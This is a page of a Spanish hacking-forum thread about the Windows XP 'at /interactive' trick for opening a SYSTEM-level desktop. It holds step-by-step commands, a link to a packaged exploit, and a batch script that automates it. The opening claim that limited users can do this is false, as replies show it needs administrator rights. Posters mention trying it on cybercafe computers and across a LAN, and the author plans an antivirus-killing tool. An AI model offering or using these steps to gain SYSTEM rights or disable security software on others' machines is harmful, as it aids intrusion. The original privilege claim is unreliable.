Páginas: [1] 2 
|
 |
|
 Autor
|
Tema: Elevación de Privilegios Local (de Administrador a System) en Windows XP (Leído 4268 veces)
|
|
||MadAntrax||
|
0Elevación de privilegios local ( de Administrador a System) en Windows XPSe ha encontrado un tremendo bug que permite un usuario con privilegios limitados iniciar sesión como NT AUTHORITY\SYSTEM (esta cuenta tiene más privilegios que un Administrador). Cómo poner en práctica el 0day1*- Ejecutamos una ventana de MS-DOS (el cmd.exe) 2*- Miramos la hora local del sistema, (suponemos que son las 23:05) 3*- Escribimos el siguiente comando: at 23:06 /interactive "cmd.exe" 4*- Esperamos unos segundos y aparecerá una nueva ventana de MS-DOS. 5*- Cerramos la venata anterior, y en la nueva ventana ponemos el comando: taskkill /F /IM explorer.exe 6*- Una vez finalizado el explorer antiguo escribimos en la ventana de MS-DOS: explorer.exe 7*- Se cargará un nuevo escritorio con permisos de SYSTEM, todo lo que ejecutemos apartir de ahora tendrá permisos de System. Explicación del 0dayEl bug reside en el comando AT.EXE que se utiliza para programar tareas, el caso que ese comando ejecuta las aplicaciones como SYSTEM, de esta manera podemos ejecutar el explorador de windows o una ventana de ms-dos con los privilegios elevados. Yo mismo he codeado una simple aplicación para explotar la vulnerabilidad, ejecutar el programa y cuando los segundos vayan por 40 o 50 pulsamos el botón. Esperamos unos 10 segundos y tendremos el escritorio de System  Fuente: bugtraq http://ns2.elhacker.net/at_exploit.zip
|
|
|
|
« Última modificación: 06 Agosto 2006, 20:12 por ANELKAOS »
|
En línea
|
|
|
|
WarGhost
I love basket
 Desconectado
Mensajes: 916
TtEbAyO
|
Impresionante  . Muy bueno . P.D:voy a probarlo en algún ciber xDD. |
|
|
|
|
En línea
|
|
|
|
[Prescott]
|Blue-Heart|
Colaborador
Desconectado
Mensajes: 2.435
lll RTFM & STFW lll
|
Ya lo probé en mi maquina, funciona bien, solo que es a nivel local 
|
|
|
|
|
En línea
|
-M.C.P. -M.C.D.S.T -iBook G4 14.1" white Mac OS X Leopard 10.5 @ 1.33 Ghz, 1,536 Gb de RAM, HD 80 Gb, iSight and Mighty Mouse Wireless   |
|
|
Hendriҳ
Colaborador
Desconectado
Mensajes: 2.005
The Lord of his Middle Earth
|
Ya lo probé en mi maquina, funciona bien, solo que es a nivel local evidentemente...aunke si no estoy ekivokado se le podrian atribuir esto a kualkier PC de la LAN...si estays interesados os enseño komo se podria hacer....(si es que funciona...) Salu2 |
|
|
|
|
En línea
|
Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer |
|
|
Isirius
Wiki
 Conectado
Mensajes: 2.347
|
Muy buena información como siempre ||MadAntrax||.
|
|
|
|
« Última modificación: 30 Julio 2007, 11:49 por Isirius »
|
En línea
|
|
|
|
[Prescott]
|Blue-Heart|
Colaborador
Desconectado
Mensajes: 2.435
lll RTFM & STFW lll
|
Mmm alguien me dice como lo regreso a su estado original, sin reiniciar? o forsozamente tengo que reiniciar?...
|
|
|
|
|
En línea
|
-M.C.P. -M.C.D.S.T -iBook G4 14.1" white Mac OS X Leopard 10.5 @ 1.33 Ghz, 1,536 Gb de RAM, HD 80 Gb, iSight and Mighty Mouse Wireless |
|
|
|
||MadAntrax||
|
Es impresionante la verdad jejej solo que tengo un problema en el pc que quiero probarlo no puedo ni abrir bats ni abrir la consola que puedo hacer¿?¿? Alguna idea gracias
Si, ejecuta el programa compilado que hay en mi primer mensaje y ya esta  Mmm alguien me dice como lo regreso a su estado original, sin reiniciar? o forsozamente tengo que reiniciar?...
Cierra sesión con el comando: "logoff" e inicia luego tu sesión. Aunque recomiendo reiniciar, asi liberás el perfil de System de la memoria RAM de tu PC |
|
|
|
« Última modificación: 04 Agosto 2006, 23:45 por ||MadAntrax|| »
|
En línea
|
|
|
|
Robokop
Desconectado
Mensajes: 1.667
|
Buen aporte Gracias!!! lo probare.  Eso me da ideas para programar |
|
|
|
|
En línea
|
|
|
|
Isirius
Wiki
Conectado
Mensajes: 2.347
|
||MadAntrax|| el problema es que no puedo abrir ni bat ni exe sin idetificar ni bajarlos al pc desde internet ni meterlos por cd o disquete jajaj entonces no hay nada que hacer veradd¿?
|
|
|
|
|
En línea
|
|
|
|
silverhack
Colaborador
Desconectado
Mensajes: 1.743
|
Sólo quiero que me expliquéis una cosa porque o yo no me entero de como va la copla, o esto no funciona como explicáis... Desde una cuenta bajo el grupo Usuarios el comando AT está restringido.. Imagen adjunta..  Desde una cuenta bajo el grupo Usuarios Avanzados el comando AT está restringido también... Imagen adjunta...  Desde una cuenta bajo el grupo Administradores lógicamente me deja crear una tarea programada.. Por favor, los más avanzados en hacking, explicádmelo... |
|
|
|
|
En línea
|
No admitir corrección ni consejo sobre la propia obra es pedantería.
Jean de la Bruyere
|
|
|
|
sirdarckcat
|
 hay una frase muy famosa: "Its not a bug, its a feature" solo puedes usar "AT" si eres administrador.. es decir.. no hay bug. miren: C:\Documents and Settings\Administrador>net user rbk /add
Se ha completado el comando correctamente.
C:\Documents and Settings\Administrador>net localgroup usuarios rbk /add
Error de sistema 1378.
El nombre de cuenta especificado ya es miembro del grupo local.
C:\Documents and Settings\Administrador>runas /user:rbk cmd.exe
Escribir contraseña para rbk:
Intentando iniciar "cmd.exe" como usuario "rbk"...
despues: C:\WINDOWS\system32>at
Acceso denegado.
@MadAntrax: lo probaste? en fin.. si eres administrador, este batch hace todo automatico: @echo off
set /A x=%TIME:~3,2%+1
at %TIME:~0,3%%x% /interactive "cmd.exe /K taskkill -f -im explorer.exe & explorer.exe"
|
|
|
|
« Última modificación: 05 Agosto 2006, 02:24 por Sdc »
|
En línea
|
|
|
|
sch3m4
Colaborador
Desconectado
Mensajes: 1.518
Nihil est in intelectu quod prius not fuerit insen
|
asi es, pero esto ya fue publicado en el foro, recuerdo haberlo leido
|
|
|
|
|
En línea
|
|
|
|
silverhack
Colaborador
Desconectado
Mensajes: 1.743
|
hay una frase muy famosa:
"Its not a bug, its a feature"
solo puedes usar "AT" si eres administrador.. es decir.. no hay bug.
Amén hermano... Muchas gracias por la aclaración P.D.- Si lo digo yo no me hubiesen creído por el rollito de colaborador de Windows.. |
|
|
|
« Última modificación: 05 Agosto 2006, 02:28 por silverhack »
|
En línea
|
No admitir corrección ni consejo sobre la propia obra es pedantería.
Jean de la Bruyere
|
|
|
|
sirdarckcat
|
Tambien Windows tiene varias medidas de seguridad, para evitar la elevacion de privilegios con los programas del sistema.. como DefaultUser que se usa en situaciones anormales.. Miren, por ejemplo; 1.- Control+Alt+Suprimir 2.- [Windows] + U 3.- Ampliador => Iniciar 4.- [Alt]+[Espacio] 5.- Acerca del ampliador de windows. 6.- [Alt]+[Tab], hasta ubicarnos en "Seguridad de Windows" 7.- [Esc] 8.- Aparecera la ventana de acerca.de. 9.- Click en el link a la web de microsofot. 10.- Se abre una ventana del explorador. 11.- Archivo => Abrir Pregunta: ¿En que contexto se esta ejecutando esa ventana? "Default User" que tiene los mismos privilegios que el usuario actual. ¿Porque no se ejecuta como system? Si se estaba ejecutando como system, cuando pusiste [Control]+[Alt]+[Supr], DefaultUser es un Perfil dinamico, y depende de la sesion.. USERPROFILE=C:\Documents and Settings\Default User Saludos!! |
|
|
|
|
En línea
|
|
|
|
|
||MadAntrax||
|
Pues si, el bug (o feature) solo funciona bajo cuenta de administrador, pero eso no le quita importacia, por ejemplo: Haces un programa que se de privilegios de SYSTEM y poder finalizar procesos y servicios que un Administrador no puede (por ejemplo el nod32 o similares). Se podria programar u bonito y potente AV-Killer. En C:\Windows\Tasks se crean archivos *.job con las tareas, voy a probar si puedo crearme un JOB para ejecutar el cmd como SYSTEM y copiarlo a mano desde una cuenta de usuario (no lo he probado, pero a lo mejor funciona). Si consigo algo os aviso, gracias |
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 2 
|
|
|
 |
